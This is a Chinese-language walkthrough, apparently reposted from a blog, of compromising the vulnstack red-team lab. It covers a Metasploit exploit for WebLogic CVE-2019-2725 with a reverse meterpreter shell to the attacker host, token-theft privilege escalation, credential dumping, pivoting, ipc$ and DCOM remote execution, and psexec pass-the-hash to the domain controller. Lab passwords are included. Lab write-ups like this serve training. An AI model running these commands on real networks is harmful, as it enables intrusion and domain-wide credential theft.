vlunstack是紅日安全團隊出品的一個實戰環境,具體介紹請訪問:漏洞詳情
拓撲結構大體如下:
環境搭建
Kali
ip:192.168.111.135
Web
Ip1:192.168.111.80
Ip2:10.10.10.80
os:windows 2008
應用:weblogic 10.3.6 mssql 2008
Pc
Ip1:192.168.111.201
Ip2:10.10.10.201
Os:windows7
DC
ip:10.10.10.10
os:windows 2012
應用:AD域
內網:10.10.10.0/24
外網:192.168.111.0/24
從web機開始滲透, 這里需要手動開啟服務,在C:
\Oracle\Middleware\user_projects\domains\base_domain\bin 有一個startweblogic的批處理, 然后管理員身份運行
賬號/密碼:Administrator/1qaz@WSX
外網滲透
- 先開始nmap掃描一下192.168.111.0/24存活主機
然后對80 主機進行資訊收集掃描
通過445埠開放就存在smb服務可能還會有ms17-010/埠溢位漏洞.
開放139埠 就純真samba服務 于是判斷可能會有/遠程命令執行漏洞
開放1433埠 就存在mssql服務 有可能存在爆破/注入/SA弱口令
開放3389 那就是遠程桌面嘍
7001埠 百度了一下得知是 weblogic服務
weblogicScan進行掃描漏洞
然后百度了一下 CVE-2019-2725漏洞
CVE-2019-2725是一個 weblogic反序列化遠程命令執行漏洞,這個漏洞依舊是根據weblogic的xmldecoder(xml解碼器)反序列化漏洞
然后通過msf查看一下漏洞利用腳本
然后進入開始利用模塊
use exploit/multi/misc/weblogic_deserialize_asyncresponseservice 進入CVE-2019-2725攻擊漏洞模塊
set target windows 這個模塊默認是unix 所以我們的目標是windows 所以 改一下即可
Set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.111.135
Set rhosts 192.168.111.80 要攻擊目標
run
本來想直接提權,但是發現不能提system權限
system權限
方法1.
然后通過顯示行程pid 然后用 migrate 進行行程遷移 獲得system權限
方法2.
還可以通過令牌竊取的方式進行提權
load incognito #加載incognito(偽裝)
Getuid #查看當前token
list_tokens -u #列出可用token
impersonate_token "NT AUTHORITY\\SYSTEM" #token竊取,格式為impersonate_token"主機名\\用戶名"
rev2self #回傳之前的token
然后使用 kiwi 獲取 hash 賬號密碼
然后獲得了域里的用戶和密碼 下面使用用戶密碼進行遠程登錄
開始第二階段的資訊搜集
Net config workstation #查域資訊
得到域資訊 還有10.10.10.0/24網段
設定一條通往10.10.10.0/24網段的路由
然后設定代理
使用use post/windows/gather/arp_scanner模塊
掃描網段存活主機
然后又通過web 進行資訊收集了一下
得知 10.10.10.10 就是域控
域成員 處理web 還有一個PC機
然后判斷PC ip是10.10.10.201
下面滲透pc域用戶
方法一
首先用kali生成一個payload
然后通過web機 上傳到 10.10.10.201c盤
先上傳到web里
再控制WEB主機與PC建立一個ipc$連接:
net use \\10.10.10.201\ipc$ "lbb1111.." /user:administrator
然后把剛才上傳的檔案copy到10.10.10.201 c盤
然后再meterpreter中載入powershell模塊
在powershell里面執行如下命令,控制WEB主機使用DCOM在遠程機器PC上執行剛剛上傳到PC主機C盤里的木馬:
然后從新開啟一個msf 監聽生成的 payload 1520 埠
成功反彈
下面開始提權
方法二
代理nmap掃描10.10.10.201
使用 exploit/windows/smb/psexec模塊進行哈希傳遞
由于一開始再web機得知了域\用戶\密碼
說以就可以用這個模塊直接打了
Set smbdomain DE1AY #域
Set smbuser administrator # 域用戶
Set smbpass lbb1111.. #域用戶密碼
直接system權限
通過掃描得知3389是開噠
然后嘗試一下代理遠程能不能直接登錄
- 向DC 域控發起進攻
同樣直接利用msf的exploit/windows/smb/psexec模塊進行哈希傳遞
拿下域控制器 并且是system權限
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/390562.html
標籤:其他
上一篇:vCenter修復Apache log4j2漏洞(CVE-2021-44228, CVE-2021-45046)